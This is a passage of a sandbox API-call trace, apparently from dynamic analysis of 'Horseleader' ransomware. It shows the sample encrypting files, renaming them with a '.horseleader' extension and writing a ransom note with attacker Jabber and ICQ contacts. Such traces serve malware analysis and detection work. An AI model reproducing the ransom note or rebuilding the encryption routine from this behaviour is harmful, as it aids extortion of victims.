(lpFirst="MOFL.DLL", lpSrch=".txt") returned 0x0 [0245.679] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=364928) returned 1 [0245.679] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.679] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.683] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.683] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.683] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2a0c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.683] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.685] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.685] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.685] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x54180, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.685] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.687] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.687] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.687] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.687] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.688] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.688] CloseHandle (hObject=0x158) returned 1 [0245.688] GetProcessHeap () returned 0x780000 [0245.688] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.688] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL.horseleader") returned 81 [0245.688] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mofl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mofl.dll.horseleader")) returned 1 [0245.689] GetProcessHeap () returned 0x780000 [0245.689] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.689] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab68100, ftCreationTime.dwHighDateTime=0x1cac9a5, ftLastAccessTime.dwLowDateTime=0x5943a0f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab68100, ftLastWriteTime.dwHighDateTime=0x1cac9a5, nFileSizeHigh=0x0, nFileSizeLow=0x3574, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSTAG.TLB", cAlternateFileName="")) returned 1 [0245.689] lstrcmpiW (lpString1="MSTAG.TLB", lpString2="Windows") returned -1 [0245.689] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB") returned 70 [0245.689] StrStrIW (lpFirst="MSTAG.TLB", lpSrch=".horseleader") returned 0x0 [0245.689] lstrcmpW (lpString1="MSTAG.TLB", lpString2="#Decrypt#.txt") returned 1 [0245.689] lstrcmpW (lpString1="MSTAG.TLB", lpString2="_uninstalling_.png") returned 1 [0245.689] lstrlenW (lpString=".testttjffg") returned 11 [0245.689] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB", lpSrch=".testttjffg") returned 0x0 [0245.690] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.690] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.690] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mstag.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.692] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB") returned 70 [0245.692] StrStrW (lpFirst="MSTAG.TLB", lpSrch=".txt") returned 0x0 [0245.692] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=13684) returned 1 [0245.692] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3574, lpOverlapped=0x0) returned 1 [0245.695] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffca8c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.695] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3574, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3574, lpOverlapped=0x0) returned 1 [0245.695] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.695] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.695] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.695] CloseHandle (hObject=0x158) returned 1 [0245.696] GetProcessHeap () returned 0x780000 [0245.696] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.696] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB.horseleader") returned 82 [0245.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mstag.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mstag.tlb.horseleader")) returned 1 [0245.697] GetProcessHeap () returned 0x780000 [0245.697] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.697] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0x3d80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SmartTagInstall.exe", cAlternateFileName="SMARTT~1.EXE")) returned 1 [0245.697] lstrcmpiW (lpString1="SmartTagInstall.exe", lpString2="Windows") returned -1 [0245.697] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe") returned 80 [0245.697] StrStrIW (lpFirst="SmartTagInstall.exe", lpSrch=".horseleader") returned 0x0 [0245.697] lstrcmpW (lpString1="SmartTagInstall.exe", lpString2="#Decrypt#.txt") returned 1 [0245.697] lstrcmpW (lpString1="SmartTagInstall.exe", lpString2="_uninstalling_.png") returned 1 [0245.697] lstrlenW (lpString=".testttjffg") returned 11 [0245.697] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe", lpSrch=".testttjffg") returned 0x0 [0245.697] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.697] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\smarttaginstall.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.699] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe") returned 80 [0245.699] StrStrW (lpFirst="SmartTagInstall.exe", lpSrch=".txt") returned 0x0 [0245.699] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15744) returned 1 [0245.699] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3d80, lpOverlapped=0x0) returned 1 [0245.702] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc280, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.702] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3d80, lpOverlapped=0x0) returned 1 [0245.702] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.702] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.702] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.702] CloseHandle (hObject=0x158) returned 1 [0245.703] GetProcessHeap () returned 0x780000 [0245.703] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.703] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe.horseleader") returned 92 [0245.703] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\smarttaginstall.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\smarttaginstall.exe.horseleader")) returned 1 [0245.707] GetProcessHeap () returned 0x780000 [0245.707] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.707] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0x3d80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SmartTagInstall.exe", cAlternateFileName="SMARTT~1.EXE")) returned 0 [0245.707] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.707] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\#Decrypt#.txt") returned 74 [0245.707] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.708] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.708] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.709] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.709] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.709] CloseHandle (hObject=0x21c) returned 1 [0245.709] GetProcessHeap () returned 0x780000 [0245.709] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.709] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0245.709] lstrcmpiW (lpString1="Source Engine", lpString2="Windows") returned -1 [0245.709] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine") returned 64 [0245.709] lstrcmpW (lpString1="Source Engine", lpString2=".") returned 1 [0245.709] lstrcmpW (lpString1="Source Engine", lpString2="..") returned 1 [0245.710] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.710] GetProcessHeap () returned 0x780000 [0245.710] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0245.710] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*") returned 66 [0245.710] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.714] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.714] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\.") returned 66 [0245.714] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.714] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.714] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.715] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\..") returned 67 [0245.715] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.715] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.715] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfcedc00, ftCreationTime.dwHighDateTime=0x1ca911d, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcfcedc00, ftLastWriteTime.dwHighDateTime=0x1ca911d, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSE.EXE", cAlternateFileName="")) returned 1 [0245.715] lstrcmpiW (lpString1="OSE.EXE", lpString2="Windows") returned -1 [0245.715] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE") returned 72 [0245.715] StrStrIW (lpFirst="OSE.EXE", lpSrch=".horseleader") returned 0x0 [0245.715] lstrcmpW (lpString1="OSE.EXE", lpString2="#Decrypt#.txt") returned 1 [0245.715] lstrcmpW (lpString1="OSE.EXE", lpString2="_uninstalling_.png") returned 1 [0245.715] lstrlenW (lpString=".testttjffg") returned 11 [0245.715] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE", lpSrch=".testttjffg") returned 0x0 [0245.715] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.715] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.715] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.716] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE") returned 72 [0245.716] StrStrW (lpFirst="OSE.EXE", lpSrch=".txt") returned 0x0 [0245.716] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=174440) returned 1 [0245.716] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.716] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.720] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.720] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.720] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x12cb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.721] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.721] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.721] WriteFile (in: 